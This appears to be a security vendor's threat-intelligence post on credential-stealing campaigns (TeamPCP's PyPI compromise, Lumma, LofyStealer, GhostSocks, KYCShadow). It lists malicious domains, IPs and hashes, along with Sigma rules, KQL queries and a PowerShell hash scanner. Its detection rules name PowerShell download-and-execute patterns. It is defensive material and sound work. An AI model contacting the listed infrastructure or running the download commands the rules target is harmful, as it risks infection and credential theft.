Recent OTX pulses indicate a coordinated surge in credential theft activity spanning supply chain compromises, social engineering, and mobile malware. Threat actors TeamPCP, LofyGang, and unknown groups deploying Lumma Stealer and KYCShadow are actively targeting enterprises and consumers.
Collective Attack Chain:
- Initial Access: Supply chain compromise (Telnyx Python SDK via PyPI), ClickFix-style phishing (PowerShell obfuscation), and WhatsApp distribution (Android).
- Execution: Multi-stage loaders utilizing Node.js, PowerShell, and Python to deploy payloads, often using steganography (WAV files) or DLL sideloading.
- Objectives: Harvesting browser cookies, passwords, banking tokens (2FA), and system credentials. Use of residential proxies (GhostSocks) to obfuscate C2 traffic.
Threat Actor / Malware Profile
| Malware Family / Actor | Description | Distribution | Behavior & Persistence |
|---|---|---|---|
| TeamPCP | Supply chain attackers utilizing Python packages. | Malicious telnyx SDK on PyPI (750k downloads). | Uses a 3-stage architecture: trojanized package -> platform loader -> payload hidden in WAV file via steganography. Steals credentials and encrypts them for exfiltration. |
| LofyStealer | Infostealer targeting gamers (Minecraft). | Social engineering; Node.js loader disguised as legitimate libs. | 53.5MB Node.js loader drops 1.4MB C++ payload. Executes in-memory, targeting 8 browsers for cookies/passwords/tokens. Uses syscalls for evasion. |
| Lumma Stealer | Information stealer (Observed via ClickFix & GhostSocks). | Phishing sites (ClickFix), PowerShell scripts. | Uses HijackLoader for DLL sideloading. Often paired with GhostSocks proxy to blend traffic. Steals sensitive data from browsers and crypto wallets. |
| GhostSocks | Malware-as-a-Service (MaaS) turning devices into proxies. | marketed on Russian forums. | Written in GoLang. Uses SOCKS5 and TLS encryption. Acts as a backdoor and residential proxy network. Partners with Lumma Stealer. |
| KYCShadow | Android Banking Trojan. | WhatsApp distribution masquerading as Bank KYC app. | Multi-stage dropper using native code obfuscation. Uses Firebase C2, WebView phishing, and SMS interception to steal OTPs. Manipulates VPN traffic. |
IOC Analysis
The provided pulses include a mix of network and file-based indicators critical for detection.
-
Network IOCs:
- Domains:
aquasecurtiy.org,retreaw.click,serv.xyz,serv.biz,api.biz. - IPs:
85.11.161.198(Lumma C2/Download server),24.152.36.241(LofyStealer). - Hostnames:
w2.bruggebogeyed.site,tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io. - Action: Block these domains and IPs immediately on perimeter firewalls and secure web gateways (SWG). Hunt for outbound connections to port 9658 and non-standard HTTP ports associated with the ClickFix campaign.
- Domains:
-
File IOCs:
- Hashes: Multiple MD5, SHA1, and SHA256 hashes for loaders, payloads, and droppers (e.g.,
f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc). - Action: Load these hashes into EDR solutions for immediate scanning. Isolate endpoints returning positive matches.
- Hashes: Multiple MD5, SHA1, and SHA256 hashes for loaders, payloads, and droppers (e.g.,
Detection Engineering
Sigma Rules
YAML
title: Suspicious PowerShell Download and Execution - ClickFix/Lumma
description: Detects PowerShell commands downloading MSI files or payloads, typical of ClickFix campaigns leading to Lumma Stealer.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/64b123456789
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\\powershell.exe'
CommandLine|contains:
- 'DownloadString'
- 'Invoke-WebRequest'
- 'OutFile'
selection_payload:
CommandLine|contains:
- '.msi'
- '.dll'
condition: all of selection*
falsepositives:
- Legitimate software installation scripts
level: high
tags:
- attack.execution
- attack.t1059.001
- attack.command_and_control
- attack.t1071.001
---
title: Potential Malicious Python Package Execution - TeamPCP
description: Detects Python processes executing code from directories associated with package installations, connecting to suspicious external endpoints or launching msbuild.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/64b987654321
logsource:
product: windows
category: process_creation
detection:
selection_python:
Image|endswith: '\\python.exe'
selection_parent:
ParentImage|contains:
- '\\Scripts\'
- '\\site-packages\'
selection_suspicious_child:
CommandLine|contains:
- 'msbuild.exe'
- 'cmd.exe /c'
condition: selection_python and selection_parent and selection_suspicious_child
falsepositives:
- Legitimate developer builds
level: medium
tags:
- attack.initial_access
- attack.t1195.002
- attack.defense_evasion
- attack.t1027
---
title: GoLang Binary Proxy Behavior - GhostSocks
description: Detects GoLang compiled binaries establishing SOCKS5 proxy connections or TLS traffic to non-standard ports, indicative of GhostSocks activity.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/64b555555555
logsource:
product: windows
category: network_connection
detection:
selection_golang:
Image|contains: 'go'
selection_ports:
DestinationPort|contains:
- '1080'
- '443'
- '9658'
selection_socks:
CommandLine|contains: 'socks'
condition: 1 of selection*
falsepositives:
- Legitimate Go applications using network
level: medium
tags:
- attack.command_and_control
- attack.t1090.003
- attack.t1572
KQL (Microsoft Sentinel)
KQL — Microsoft Sentinel / Defender
// Hunt for connections to known malicious infrastructure and file hash presence
let MaliciousIPs = dynamic([\"85.11.161.198\", \"24.152.36.241\"]);
let MaliciousDomains = dynamic([\"serv.biz\", \"serv.xyz\", \"api.biz\", \"retreaw.click\", \"aquasecurtiy.org\"]);
// DeviceNetworkEvents (MDATP/Defender) or CommonSecurityLog (Firewall)
DeviceNetworkEvents
| where RemoteIP in (MaliciousIPs) or RemoteUrl has_any (MaliciousDomains)
| extend Timestamp = TimeGenerated, DeviceName = DeviceName, InitiatingProcessAccountName = InitiatingProcessAccountName
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
;
// Hunt for File Hashes
let MaliciousHashes = dynamic([
\"6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a\",
\"293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881\",
\"f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc\",
\"1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb\"
]);
DeviceFileEvents
| where SHA256 in (MaliciousHashes) or MD5 in (MaliciousHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| order by Timestamp desc
PowerShell Hunt Script
PowerShell
# IOC Hunt Script for TeamPCP, LofyStealer, Lumma, and KYCShadow droppers
# Requires Administrator Privileges
$TargetHashes = @(
\"6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a\", # TeamPCP
\"8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2\", # TeamPCP
\"293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881\", # LofyStealer
\"45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7\", # LofyStealer
\"f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc\", # Lumma/HijackLoader
\"1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb\" # KYCShadow
)
Write-Host \"[+] Scanning system for known malicious file hashes...\" -ForegroundColor Cyan
# Search C: drive (Modify drive letters as needed for your environment)
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Include *.exe, *.dll, *.msi, *.py, *.wav, *.apk |
ForEach-Object {
$file = $_
$hash = (Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
if ($hash -in $TargetHashes) {
Write-Host \"[!] MALICIOUS FILE DETECTED: $($file.FullName)\" -ForegroundColor Red
Write-Host \" Hash: $hash\"
Write-Host \" Creation Time: $($file.CreationTime)\"
}
}
Write-Host \"[+] Scan Complete.\" -ForegroundColor Green
# Response Priorities
Immediate (0-24h)
- Block IOCs: Push all IP addresses and domains listed in the IOC Analysis section to firewalls, SIEM blocklists, and Secure Web Gateways.
- Hunt for Compromise: Run the provided PowerShell script on critical endpoints to check for the presence of malware files.
- Isolate Infected Hosts: If any file hashes or network connections are detected, isolate the affected machine from the network immediately.
Short-term (24-48h)
- Credential Reset: If credential-thealing malware (Lumma, LofyStealer, TeamPCP) is suspected to have executed, force a password reset for all users on the affected segment, prioritizing service accounts and administrators.
- Supply Chain Audit: Developers must audit
telnyxpackage versions in use. Upgrade to the latest verified version immediately. Remove any suspiciousnode.jspackages. - Mobile Threat Check: Send alerts to mobile device users (specifically in targeted regions like India) warning about fake KYC apps. Check MDM for the presence of
servrelated domains in network logs.
Long-term (1 Week+)
- Architecture Hardening: Implement Python package verification mechanisms (e.g., cryptographic hash checking of artifacts before installation) to prevent supply chain attacks.
- Proxy Detection: Enhance network monitoring to detect anomalous SOCKS5 traffic and TLS-encrypted proxy patterns typical of GhostSocks.
- Phishing Resilience: Conduct security awareness training focusing on "ClickFix" social engineering (fake browser errors leading to PowerShell execution).
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsinfostealersupply-chaincredential-theftlumma-stealerteampcp
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.